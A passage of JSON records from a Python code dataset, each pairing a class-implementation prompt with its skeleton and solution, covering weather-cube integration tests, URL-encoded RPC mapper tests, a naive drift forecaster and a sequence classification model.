negative.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n height_points = np.array([5.0, 10.0, 20.0])\n cube = _set_up_height_cube(height_points)\n self.plugin_positive = Integration('height', positive_integration=True)\n self.plugin_positive.input_cube = cube.copy()\n self.plugin_negative = Integration('height')\n self.plugin_negative.input_cube = cube.copy()\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.plugin_negative.prepare_for_integration()\n self.assertIsInstance(result, tuple)\n self.assertEqual(len(result), 2)\n self.assertIsInstance(result[0], iris.cube.Cube)\n self.assertIsInstance(result[1], iris.cube.Cube)\n<|end_body_1|>\n\n<|body_start_2|>\n result = self.plugin_positive.prepare_for_integration()\n self.assertArrayAlmostEqual(result[0].coord('height').points, np.array([10.0, 20.0]))\n self.assertArrayAlmostEqual(result[1].coord('height').points, np.array([5.0, 10.0]))\n<|end_body_2|>\n\n<|body_start_3|>\n self.plugin_negative.input_cube.coord('height').points = np.array([20.0, 10.0, 5.0])\n result = self.plugin_negative.prepare_for_integration()\n self.assertArrayAlmostEqual(result[0].coord('height').points, np.array([20.0, 10.0]))\n self.assertArrayAlmostEqual(result[1].coord('height').points, np.array([10.0, 5.0]))\n<|end_body_3|>\n", "revision_id": "cd2c9019944345df1e703bf8f625db537ad9f559", "skeleton": "<|skeleton|>\nclass Test_prepare_for_integration:\n \"\"\"Test the prepare_for_integration method.\"\"\"\n\n def setUp(self):\n \"\"\"Set up the cube.\"\"\"\n <|body_0|>\n\n def test_basic(self):\n \"\"\"Test that the type of the returned value is as expected and the expected number of items are returned.\"\"\"\n <|body_1|>\n\n def test_positive_points(self):\n \"\"\"Test that the expected coordinate points are returned for each cube when the direction of integration is positive.\"\"\"\n <|body_2|>\n\n def test_negative_points(self):\n \"\"\"Test that the expected coordinate points are returned for each cube when the direction of integration is negative.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Test_prepare_for_integration:\n \"\"\"Test the prepare_for_integration method.\"\"\"\n\n def setUp(self):\n \"\"\"Set up the cube.\"\"\"\n height_points = np.array([5.0, 10.0, 20.0])\n cube = _set_up_height_cube(height_points)\n self.plugin_positive = Integration('height', positive_integration=True)\n self.plugin_positive.input_cube = cube.copy()\n self.plugin_negative = Integration('height')\n self.plugin_negative.input_cube = cube.copy()\n\n def test_basic(self):\n \"\"\"Test that the type of the returned value is as expected and the expected number of items are returned.\"\"\"\n result = self.plugin_negative.prepare_for_integration()\n self.assertIsInstance(result, tuple)\n self.assertEqual(len(result), 2)\n self.assertIsInstance(result[0], iris.cube.Cube)\n self.assertIsInstance(result[1], iris.cube.Cube)\n\n def test_positive_points(self):\n \"\"\"Test that the expected coordinate points are returned for each cube when the direction of integration is positive.\"\"\"\n result = self.plugin_positive.prepare_for_integration()\n self.assertArrayAlmostEqual(result[0].coord('height').points, np.array([10.0, 20.0]))\n self.assertArrayAlmostEqual(result[1].coord('height').points, np.array([5.0, 10.0]))\n\n def test_negative_points(self):\n \"\"\"Test that the expected coordinate points are returned for each cube when the direction of integration is negative.\"\"\"\n self.plugin_negative.input_cube.coord('height').points = np.array([20.0, 10.0, 5.0])\n result = self.plugin_negative.prepare_for_integration()\n self.assertArrayAlmostEqual(result[0].coord('height').points, np.array([20.0, 10.0]))\n self.assertArrayAlmostEqual(result[1].coord('height').points, np.array([10.0, 5.0]))\n", "source": "the_stack_v2_python_sparse", "source_path": "improver_tests/utilities/test_mathematical_operations.py", "source_repo": "metoppv/improver", "split": "test", "star_events_count": 101} {"blob_id": "6bdc62e4e294afedd8066db2a224373c030a7c6f", "bodies": ["self.Reinitialize(urllib.urlencode([('prefix_integer_field', '10'), ('prefix_string_field', 'a string'), ('prefix_enum_field', 'VAL1')]), self.content_type)\nurl_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\nrequest = url_encoded_mapper.build_request(self.service_handler, Request1)\nself.assertEquals(10, request.integer_field)\nself.assertEquals('a string', request.string_field)\nself.assertEquals(Enum1.VAL1, request.enum_field)", "self.Reinitialize(urllib.urlencode((('integer_field', '10'), ('integer_field', '20'))), content_type=self.content_type)\nurl_encoded_mapper = service_handlers.URLEncodedRPCMapper()\nself.assertRaises(service_handlers.RequestError, url_encoded_mapper.build_request, self.service_handler, Service.method1.remote.request_type)", "response = Response1()\nresponse.integer_field = 10\nresponse.string_field = u'a string'\nresponse.enum_field = Enum1.VAL3\nurl_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\nurl_encoded_mapper.build_response(self.service_handler, response)\nself.assertEquals('application/x-www-form-urlencoded', self.response.headers['content-type'])\nself.assertEquals(cgi.parse_qs(self.response.out.getvalue(), True, True), {'prefix_integer_field': ['10'], 'prefix_string_field': [u'a string'], 'prefix_enum_field': ['VAL3']})"], "bodies_text": "<|body_start_0|>\n self.Reinitialize(urllib.urlencode([('prefix_integer_field', '10'), ('prefix_string_field', 'a string'), ('prefix_enum_field', 'VAL1')]), self.content_type)\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\n request = url_encoded_mapper.build_request(self.service_handler, Request1)\n self.assertEquals(10, request.integer_field)\n self.assertEquals('a string', request.string_field)\n self.assertEquals(Enum1.VAL1, request.enum_field)\n<|end_body_0|>\n\n<|body_start_1|>\n self.Reinitialize(urllib.urlencode((('integer_field', '10'), ('integer_field', '20'))), content_type=self.content_type)\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper()\n self.assertRaises(service_handlers.RequestError, url_encoded_mapper.build_request, self.service_handler, Service.method1.remote.request_type)\n<|end_body_1|>\n\n<|body_start_2|>\n response = Response1()\n response.integer_field = 10\n response.string_field = u'a string'\n response.enum_field = Enum1.VAL3\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\n url_encoded_mapper.build_response(self.service_handler, response)\n self.assertEquals('application/x-www-form-urlencoded', self.response.headers['content-type'])\n self.assertEquals(cgi.parse_qs(self.response.out.getvalue(), True, True), {'prefix_integer_field': ['10'], 'prefix_string_field': [u'a string'], 'prefix_enum_field': ['VAL3']})\n<|end_body_2|>\n", "class_docstring": "Test the URL encoded RPC mapper.", "class_name": "URLEncodedRPCMapperTest", "detected_licenses": ["Apache-2.0", "BSD-3-Clause", "LGPL-2.0-or-later", "GPL-1.0-or-later", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass URLEncodedRPCMapperTest:\n \"\"\"Test the URL encoded RPC mapper.\"\"\"\n\n def testBuildRequest_Prefix(self):\n \"\"\"Test building request with parameter prefix.\"\"\"\n <|body_0|>\n\n def testBuildRequest_DecodeError(self):\n \"\"\"Test trying to build request that causes a decode error.\"\"\"\n <|body_1|>\n\n def testBuildResponse_Prefix(self):\n \"\"\"Test building a response with parameter prefix.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.Reinitialize(urllib.urlencode([('prefix_integer_field', '10'), ('prefix_string_field', 'a string'), ('prefix_enum_field', 'VAL1')]), self.content_type)\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\n request = url_encoded_mapper.build_request(self.service_handler, Request1)\n self.assertEquals(10, request.integer_field)\n self.assertEquals('a string', request.string_field)\n self.assertEquals(Enum1.VAL1, request.enum_field)\n<|end_body_0|>\n\n<|body_start_1|>\n self.Reinitialize(urllib.urlencode((('integer_field', '10'), ('integer_field', '20'))), content_type=self.content_type)\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper()\n self.assertRaises(service_handlers.RequestError, url_encoded_mapper.build_request, self.service_handler, Service.method1.remote.request_type)\n<|end_body_1|>\n\n<|body_start_2|>\n response = Response1()\n response.integer_field = 10\n response.string_field = u'a string'\n response.enum_field = Enum1.VAL3\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\n url_encoded_mapper.build_response(self.service_handler, response)\n self.assertEquals('application/x-www-form-urlencoded', self.response.headers['content-type'])\n self.assertEquals(cgi.parse_qs(self.response.out.getvalue(), True, True), {'prefix_integer_field': ['10'], 'prefix_string_field': [u'a string'], 'prefix_enum_field': ['VAL3']})\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000031", "length_bytes": 46517, "license_type": "permissive", "methods": [{"docstring": "Test building request with parameter prefix.", "name": "testBuildRequest_Prefix", "signature": "def testBuildRequest_Prefix(self)"}, {"docstring": "Test trying to build request that causes a decode error.", "name": "testBuildRequest_DecodeError", "signature": "def testBuildRequest_DecodeError(self)"}, {"docstring": "Test building a response with parameter prefix.", "name": "testBuildResponse_Prefix", "signature": "def testBuildResponse_Prefix(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002050", "prompt": "Implement the Python class `URLEncodedRPCMapperTest` described below.\n\nClass description:\nTest the URL encoded RPC mapper.\n\nMethod signatures and docstrings:\n- def testBuildRequest_Prefix(self): Test building request with parameter prefix.\n- def testBuildRequest_DecodeError(self): Test trying to build request that causes a decode error.\n- def testBuildResponse_Prefix(self): Test building a response with parameter prefix.", "prompted_full_text": "Implement the Python class `URLEncodedRPCMapperTest` described below.\n\nClass description:\nTest the URL encoded RPC mapper.\n\nMethod signatures and docstrings:\n- def testBuildRequest_Prefix(self): Test building request with parameter prefix.\n- def testBuildRequest_DecodeError(self): Test trying to build request that causes a decode error.\n- def testBuildResponse_Prefix(self): Test building a response with parameter prefix.\n\n<|skeleton|>\nclass URLEncodedRPCMapperTest:\n \"\"\"Test the URL encoded RPC mapper.\"\"\"\n\n def testBuildRequest_Prefix(self):\n \"\"\"Test building request with parameter prefix.\"\"\"\n <|body_0|>\n\n def testBuildRequest_DecodeError(self):\n \"\"\"Test trying to build request that causes a decode error.\"\"\"\n <|body_1|>\n\n def testBuildResponse_Prefix(self):\n \"\"\"Test building a response with parameter prefix.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.Reinitialize(urllib.urlencode([('prefix_integer_field', '10'), ('prefix_string_field', 'a string'), ('prefix_enum_field', 'VAL1')]), self.content_type)\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\n request = url_encoded_mapper.build_request(self.service_handler, Request1)\n self.assertEquals(10, request.integer_field)\n self.assertEquals('a string', request.string_field)\n self.assertEquals(Enum1.VAL1, request.enum_field)\n<|end_body_0|>\n\n<|body_start_1|>\n self.Reinitialize(urllib.urlencode((('integer_field', '10'), ('integer_field', '20'))), content_type=self.content_type)\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper()\n self.assertRaises(service_handlers.RequestError, url_encoded_mapper.build_request, self.service_handler, Service.method1.remote.request_type)\n<|end_body_1|>\n\n<|body_start_2|>\n response = Response1()\n response.integer_field = 10\n response.string_field = u'a string'\n response.enum_field = Enum1.VAL3\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\n url_encoded_mapper.build_response(self.service_handler, response)\n self.assertEquals('application/x-www-form-urlencoded', self.response.headers['content-type'])\n self.assertEquals(cgi.parse_qs(self.response.out.getvalue(), True, True), {'prefix_integer_field': ['10'], 'prefix_string_field': [u'a string'], 'prefix_enum_field': ['VAL3']})\n<|end_body_2|>\n", "revision_id": "72a05af97787001756bae2511b7985e61498c965", "skeleton": "<|skeleton|>\nclass URLEncodedRPCMapperTest:\n \"\"\"Test the URL encoded RPC mapper.\"\"\"\n\n def testBuildRequest_Prefix(self):\n \"\"\"Test building request with parameter prefix.\"\"\"\n <|body_0|>\n\n def testBuildRequest_DecodeError(self):\n \"\"\"Test trying to build request that causes a decode error.\"\"\"\n <|body_1|>\n\n def testBuildResponse_Prefix(self):\n \"\"\"Test building a response with parameter prefix.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class URLEncodedRPCMapperTest:\n \"\"\"Test the URL encoded RPC mapper.\"\"\"\n\n def testBuildRequest_Prefix(self):\n \"\"\"Test building request with parameter prefix.\"\"\"\n self.Reinitialize(urllib.urlencode([('prefix_integer_field', '10'), ('prefix_string_field', 'a string'), ('prefix_enum_field', 'VAL1')]), self.content_type)\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\n request = url_encoded_mapper.build_request(self.service_handler, Request1)\n self.assertEquals(10, request.integer_field)\n self.assertEquals('a string', request.string_field)\n self.assertEquals(Enum1.VAL1, request.enum_field)\n\n def testBuildRequest_DecodeError(self):\n \"\"\"Test trying to build request that causes a decode error.\"\"\"\n self.Reinitialize(urllib.urlencode((('integer_field', '10'), ('integer_field', '20'))), content_type=self.content_type)\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper()\n self.assertRaises(service_handlers.RequestError, url_encoded_mapper.build_request, self.service_handler, Service.method1.remote.request_type)\n\n def testBuildResponse_Prefix(self):\n \"\"\"Test building a response with parameter prefix.\"\"\"\n response = Response1()\n response.integer_field = 10\n response.string_field = u'a string'\n response.enum_field = Enum1.VAL3\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\n url_encoded_mapper.build_response(self.service_handler, response)\n self.assertEquals('application/x-www-form-urlencoded', self.response.headers['content-type'])\n self.assertEquals(cgi.parse_qs(self.response.out.getvalue(), True, True), {'prefix_integer_field': ['10'], 'prefix_string_field': [u'a string'], 'prefix_enum_field': ['VAL3']})\n", "source": "the_stack_v2_python_sparse", "source_path": "third_party/catapult/third_party/gsutil/third_party/protorpc/protorpc/webapp/service_handlers_test.py", "source_repo": "metux/chromium-suckless", "split": "test", "star_events_count": 5} {"blob_id": "00aebdf3dfd86c7ea7580ca6118a1db55fb135ab", "bodies": ["self.slope = -1.0\nself.last_obs = -1.0\nself.last_obs_ind = -1\nself._fitted = False", "if X.size != y.size:\n raise ValueError(\"'X' and 'y' size must match.\")\nself.last_obs = y[-1]\nself.last_obs_ind = X[-1]\nif y.size > 1:\n self.slope = (y[-1] - y[0]) / (X[-1] - X[0])\nelse:\n self.slope = 0.0\nself._fitted = True\nreturn self", "if not self._fitted:\n raise ValueError('Model is not fitted.')\ndiff_timestamps = X - self.last_obs_ind\nif np.any(diff_timestamps < 0):\n raise ValueError('Timestamps must be higher than the last fitted timestamp ({}).'.format(self.last_obs_ind))\nreturn self.last_obs + diff_timestamps * self.slope"], "bodies_text": "<|body_start_0|>\n self.slope = -1.0\n self.last_obs = -1.0\n self.last_obs_ind = -1\n self._fitted = False\n<|end_body_0|>\n\n<|body_start_1|>\n if X.size != y.size:\n raise ValueError(\"'X' and 'y' size must match.\")\n self.last_obs = y[-1]\n self.last_obs_ind = X[-1]\n if y.size > 1:\n self.slope = (y[-1] - y[0]) / (X[-1] - X[0])\n else:\n self.slope = 0.0\n self._fitted = True\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n if not self._fitted:\n raise ValueError('Model is not fitted.')\n diff_timestamps = X - self.last_obs_ind\n if np.any(diff_timestamps < 0):\n raise ValueError('Timestamps must be higher than the last fitted timestamp ({}).'.format(self.last_obs_ind))\n return self.last_obs + diff_timestamps * self.slope\n<|end_body_2|>\n", "class_docstring": "Naive model with drift for time-series forecasting. In the drift model, the forecasts are equal to the last observation of a given time-series plus an additional value proportional to the forecasted timestamp. The attributed to the timestamp is estimated from the first and last observation of the given time-series.", "class_name": "TSNaiveDrift", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TSNaiveDrift:\n \"\"\"Naive model with drift for time-series forecasting. In the drift model, the forecasts are equal to the last observation of a given time-series plus an additional value proportional to the forecasted timestamp. The attributed to the timestamp is estimated from the first and last observation of the given time-series.\"\"\"\n\n def __init__(self):\n \"\"\"Init a Naive model with drift.\"\"\"\n <|body_0|>\n\n def fit(self, X: np.ndarray, y: np.ndarray, **kwargs) -> 'TSNaiveDrift':\n \"\"\"Fit a Naive model with drift. This model calculates the slope of the line crossing the first and last observation of ``y``, and stores it alongside the last observation value of ``y`` and its timestamp. This is equivalent of calculating the mean of the slopes between each pair of adjacent observation, since it is a telescoping sum, and use it as the model drift coefficient.\"\"\"\n <|body_1|>\n\n def predict(self, X: np.ndarray) -> np.ndarray:\n \"\"\"Predict new observations from the timestamps 'X'.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.slope = -1.0\n self.last_obs = -1.0\n self.last_obs_ind = -1\n self._fitted = False\n<|end_body_0|>\n\n<|body_start_1|>\n if X.size != y.size:\n raise ValueError(\"'X' and 'y' size must match.\")\n self.last_obs = y[-1]\n self.last_obs_ind = X[-1]\n if y.size > 1:\n self.slope = (y[-1] - y[0]) / (X[-1] - X[0])\n else:\n self.slope = 0.0\n self._fitted = True\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n if not self._fitted:\n raise ValueError('Model is not fitted.')\n diff_timestamps = X - self.last_obs_ind\n if np.any(diff_timestamps < 0):\n raise ValueError('Timestamps must be higher than the last fitted timestamp ({}).'.format(self.last_obs_ind))\n return self.last_obs + diff_timestamps * self.slope\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000032", "length_bytes": 12299, "license_type": "permissive", "methods": [{"docstring": "Init a Naive model with drift.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Fit a Naive model with drift. This model calculates the slope of the line crossing the first and last observation of ``y``, and stores it alongside the last observation value of ``y`` and its timestamp. This is equivalent of calculating the mean of the slopes between each pair of adjacent observation, since it is a telescoping sum, and use it as the model drift coefficient.", "name": "fit", "signature": "def fit(self, X: np.ndarray, y: np.ndarray, **kwargs) -> 'TSNaiveDrift'"}, {"docstring": "Predict new observations from the timestamps 'X'.", "name": "predict", "signature": "def predict(self, X: np.ndarray) -> np.ndarray"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_004496", "prompt": "Implement the Python class `TSNaiveDrift` described below.\n\nClass description:\nNaive model with drift for time-series forecasting. In the drift model, the forecasts are equal to the last observation of a given time-series plus an additional value proportional to the forecasted timestamp. The attributed to the timestamp is estimated from the first and last observation of the given time-series.\n\nMethod signatures and docstrings:\n- def __init__(self): Init a Naive model with drift.\n- def fit(self, X: np.ndarray, y: np.ndarray, **kwargs) -> 'TSNaiveDrift': Fit a Naive model with drift. This model calculates the slope of the line crossing the first and last observation of ``y``, and stores it alongside the last observation value of ``y`` and its timestamp. This is equivalent of calculating the mean of the slopes between each pair of adjacent observation, since it is a telescoping sum, and use it as the model drift coefficient.\n- def predict(self, X: np.ndarray) -> np.ndarray: Predict new observations from the timestamps 'X'.", "prompted_full_text": "Implement the Python class `TSNaiveDrift` described below.\n\nClass description:\nNaive model with drift for time-series forecasting. In the drift model, the forecasts are equal to the last observation of a given time-series plus an additional value proportional to the forecasted timestamp. The attributed to the timestamp is estimated from the first and last observation of the given time-series.\n\nMethod signatures and docstrings:\n- def __init__(self): Init a Naive model with drift.\n- def fit(self, X: np.ndarray, y: np.ndarray, **kwargs) -> 'TSNaiveDrift': Fit a Naive model with drift. This model calculates the slope of the line crossing the first and last observation of ``y``, and stores it alongside the last observation value of ``y`` and its timestamp. This is equivalent of calculating the mean of the slopes between each pair of adjacent observation, since it is a telescoping sum, and use it as the model drift coefficient.\n- def predict(self, X: np.ndarray) -> np.ndarray: Predict new observations from the timestamps 'X'.\n\n<|skeleton|>\nclass TSNaiveDrift:\n \"\"\"Naive model with drift for time-series forecasting. In the drift model, the forecasts are equal to the last observation of a given time-series plus an additional value proportional to the forecasted timestamp. The attributed to the timestamp is estimated from the first and last observation of the given time-series.\"\"\"\n\n def __init__(self):\n \"\"\"Init a Naive model with drift.\"\"\"\n <|body_0|>\n\n def fit(self, X: np.ndarray, y: np.ndarray, **kwargs) -> 'TSNaiveDrift':\n \"\"\"Fit a Naive model with drift. This model calculates the slope of the line crossing the first and last observation of ``y``, and stores it alongside the last observation value of ``y`` and its timestamp. This is equivalent of calculating the mean of the slopes between each pair of adjacent observation, since it is a telescoping sum, and use it as the model drift coefficient.\"\"\"\n <|body_1|>\n\n def predict(self, X: np.ndarray) -> np.ndarray:\n \"\"\"Predict new observations from the timestamps 'X'.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.slope = -1.0\n self.last_obs = -1.0\n self.last_obs_ind = -1\n self._fitted = False\n<|end_body_0|>\n\n<|body_start_1|>\n if X.size != y.size:\n raise ValueError(\"'X' and 'y' size must match.\")\n self.last_obs = y[-1]\n self.last_obs_ind = X[-1]\n if y.size > 1:\n self.slope = (y[-1] - y[0]) / (X[-1] - X[0])\n else:\n self.slope = 0.0\n self._fitted = True\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n if not self._fitted:\n raise ValueError('Model is not fitted.')\n diff_timestamps = X - self.last_obs_ind\n if np.any(diff_timestamps < 0):\n raise ValueError('Timestamps must be higher than the last fitted timestamp ({}).'.format(self.last_obs_ind))\n return self.last_obs + diff_timestamps * self.slope\n<|end_body_2|>\n", "revision_id": "61cc1f63fa055c7466151cfefa7baff8df1702b7", "skeleton": "<|skeleton|>\nclass TSNaiveDrift:\n \"\"\"Naive model with drift for time-series forecasting. In the drift model, the forecasts are equal to the last observation of a given time-series plus an additional value proportional to the forecasted timestamp. The attributed to the timestamp is estimated from the first and last observation of the given time-series.\"\"\"\n\n def __init__(self):\n \"\"\"Init a Naive model with drift.\"\"\"\n <|body_0|>\n\n def fit(self, X: np.ndarray, y: np.ndarray, **kwargs) -> 'TSNaiveDrift':\n \"\"\"Fit a Naive model with drift. This model calculates the slope of the line crossing the first and last observation of ``y``, and stores it alongside the last observation value of ``y`` and its timestamp. This is equivalent of calculating the mean of the slopes between each pair of adjacent observation, since it is a telescoping sum, and use it as the model drift coefficient.\"\"\"\n <|body_1|>\n\n def predict(self, X: np.ndarray) -> np.ndarray:\n \"\"\"Predict new observations from the timestamps 'X'.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TSNaiveDrift:\n \"\"\"Naive model with drift for time-series forecasting. In the drift model, the forecasts are equal to the last observation of a given time-series plus an additional value proportional to the forecasted timestamp. The attributed to the timestamp is estimated from the first and last observation of the given time-series.\"\"\"\n\n def __init__(self):\n \"\"\"Init a Naive model with drift.\"\"\"\n self.slope = -1.0\n self.last_obs = -1.0\n self.last_obs_ind = -1\n self._fitted = False\n\n def fit(self, X: np.ndarray, y: np.ndarray, **kwargs) -> 'TSNaiveDrift':\n \"\"\"Fit a Naive model with drift. This model calculates the slope of the line crossing the first and last observation of ``y``, and stores it alongside the last observation value of ``y`` and its timestamp. This is equivalent of calculating the mean of the slopes between each pair of adjacent observation, since it is a telescoping sum, and use it as the model drift coefficient.\"\"\"\n if X.size != y.size:\n raise ValueError(\"'X' and 'y' size must match.\")\n self.last_obs = y[-1]\n self.last_obs_ind = X[-1]\n if y.size > 1:\n self.slope = (y[-1] - y[0]) / (X[-1] - X[0])\n else:\n self.slope = 0.0\n self._fitted = True\n return self\n\n def predict(self, X: np.ndarray) -> np.ndarray:\n \"\"\"Predict new observations from the timestamps 'X'.\"\"\"\n if not self._fitted:\n raise ValueError('Model is not fitted.')\n diff_timestamps = X - self.last_obs_ind\n if np.any(diff_timestamps < 0):\n raise ValueError('Timestamps must be higher than the last fitted timestamp ({}).'.format(self.last_obs_ind))\n return self.last_obs + diff_timestamps * self.slope\n", "source": "the_stack_v2_python_sparse", "source_path": "tspymfe/_models.py", "source_repo": "FelSiq/ts-pymfe", "split": "test", "star_events_count": 9} {"blob_id": "4461b2eba907b9afb6292ad0ef79f692485cc5db", "bodies": ["super(SeqClassificationTaskModel, self).__init__()\nmodel_type = model_config.get('model_type', 'transformer')\nhidden_size = model_config.get('hidden_size', 512)\nin_channels = hidden_size * 2 if model_type == 'lstm' else hidden_size\nself.conv_decoder = nn.Sequential(nn.Conv1D(in_channels=in_channels, out_channels=128, kernel_size=5, padding='same', data_format='NLC'), nn.ReLU(), nn.Conv1D(in_channels=128, out_channels=class_num, kernel_size=3, padding='same', data_format='NLC'))\nself.encoder_model = encoder_model", "encoder_output = self.encoder_model(input, pos)\ndecoder_output = self.conv_decoder(encoder_output)\nreturn decoder_output"], "bodies_text": "<|body_start_0|>\n super(SeqClassificationTaskModel, self).__init__()\n model_type = model_config.get('model_type', 'transformer')\n hidden_size = model_config.get('hidden_size', 512)\n in_channels = hidden_size * 2 if model_type == 'lstm' else hidden_size\n self.conv_decoder = nn.Sequential(nn.Conv1D(in_channels=in_channels, out_channels=128, kernel_size=5, padding='same', data_format='NLC'), nn.ReLU(), nn.Conv1D(in_channels=128, out_channels=class_num, kernel_size=3, padding='same', data_format='NLC'))\n self.encoder_model = encoder_model\n<|end_body_0|>\n\n<|body_start_1|>\n encoder_output = self.encoder_model(input, pos)\n decoder_output = self.conv_decoder(encoder_output)\n return decoder_output\n<|end_body_1|>\n", "class_docstring": "SeqClassificationTaskModel", "class_name": "SeqClassificationTaskModel", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SeqClassificationTaskModel:\n \"\"\"SeqClassificationTaskModel\"\"\"\n\n def __init__(self, class_num, model_config, encoder_model):\n \"\"\"__init__\"\"\"\n <|body_0|>\n\n def forward(self, input, pos):\n \"\"\"forward\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(SeqClassificationTaskModel, self).__init__()\n model_type = model_config.get('model_type', 'transformer')\n hidden_size = model_config.get('hidden_size', 512)\n in_channels = hidden_size * 2 if model_type == 'lstm' else hidden_size\n self.conv_decoder = nn.Sequential(nn.Conv1D(in_channels=in_channels, out_channels=128, kernel_size=5, padding='same', data_format='NLC'), nn.ReLU(), nn.Conv1D(in_channels=128, out_channels=class_num, kernel_size=3, padding='same', data_format='NLC'))\n self.encoder_model = encoder_model\n<|end_body_0|>\n\n<|body_start_1|>\n encoder_output = self.encoder_model(input, pos)\n decoder_output = self.conv_decoder(encoder_output)\n return decoder_output\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000033", "length_bytes": 17522, "license_type": "permissive", "methods": [{"docstring": "__init__", "name": "__init__", "signature": "def __init__(self, class_num, model_config, encoder_model)"}, {"docstring": "forward", "name": "forward", "signature": "def forward(self, input, pos)"}], "n_methods": 2, "prompt": "Implement the Python class `SeqClassificationTaskModel` described below.\n\nClass description:\nSeqClassificationTaskModel\n\nMethod signatures and docstrings:\n- def __init__(self, class_num, model_config, encoder_model): __init__\n- def forward(self, input, pos): forward", "prompted_full_text": "Implement the Python class `SeqClassificationTaskModel` described below.\n\nClass description:\nSeqClassificationTaskModel\n\nMethod signatures and docstrings:\n- def __init__(self, class_num, model_config, encoder_model): __init__\n- def forward(self, input, pos): forward\n\n<|skeleton|>\nclass SeqClassificationTaskModel:\n \"\"\"SeqClassificationTaskModel\"\"\"\n\n def __init__(self, class_num, model_config, encoder_model):\n \"\"\"__init__\"\"\"\n <|body_0|>\n\n def forward(self, input, pos):\n \"\"\"forward\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(SeqClassificationTaskModel, self).__init__()\n model_type = model_config.get('model_type', 'transformer')\n hidden_size = model_config.get('hidden_size', 512)\n in_channels = hidden_size * 2 if model_type == 'lstm' else hidden_size\n self.conv_decoder = nn.Sequential(nn.Conv1D(in_channels=in_channels, out_channels=128, kernel_size=5, padding='same', data_format='NLC'), nn.ReLU(), nn.Conv1D(in_channels=128, out_channels=class_num, kernel_size=3, padding='same', data_format='NLC'))\n self.encoder_model = encoder_model\n<|end_body_0|>\n\n<|body_start_1|>\n encoder_output = self.encoder_model(input, pos)\n decoder_output = self.conv_decoder(encoder_output)\n return decoder_output\n<|end_body_1|>\n", "revision_id": "e6ab0261eb719c21806bbadfd94001ecfe27de45", "skeleton": "<|skeleton|>\nclass SeqClassificationTaskModel:\n \"\"\"SeqClassificationTaskModel\"\"\"\n\n def __init__(self, class_num, model_config, encoder_model):\n \"\"\"__init__\"\"\"\n <|body_0|>\n\n def forward(self, input, pos):\n \"\"\"forward\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SeqClassificationTaskModel:\n \"\"\"SeqClassificationTaskModel\"\"\"\n\n def __init__(self, class_num, model_config, encoder_model):\n \"\"\"__init__\"\"\"\n super(SeqClassificationTaskModel, self).__init__()\n model_type = model_config.get('model_type', 'transformer')\n hidden_size = model_config.get('hidden_size', 512)\n in_channels = hidden_size * 2 if model_type == 'lstm' else hidden_size\n self.conv_decoder = nn.Sequential(nn.Conv1D(in_channels=in_channels, out_channels=128, kernel_size=5, padding='same', data_format='NLC'), nn.ReLU(), nn.Conv1D(in_channels=128, out_channels=class_num, kernel_size=3, padding='same', data_format='NLC'))\n self.encoder_model = encoder_model\n\n def forward(self, input, pos):\n \"\"\"forward\"\"\"\n encoder_output = self.encoder_model(input, pos)\n decoder_output = self.conv_decoder(encoder_output)\n return decoder_output\n", "source": "the_stack_v2_python_sparse", "source_path": "pahelix/model_zoo/protein_sequence_model.py", "source_repo": "PaddlePaddle/PaddleHelix", "split": "test", "star_events_count": 771} {"blob_id": "0e352c78ca46c6854752a32f00b2a795c189e088", "bodies": ["self.Vmatrix = np.array(Vmatrix).astype(float)\nself.sourcenames = sourcenames\nself.targetnames = targetnames", "vals2Dout = 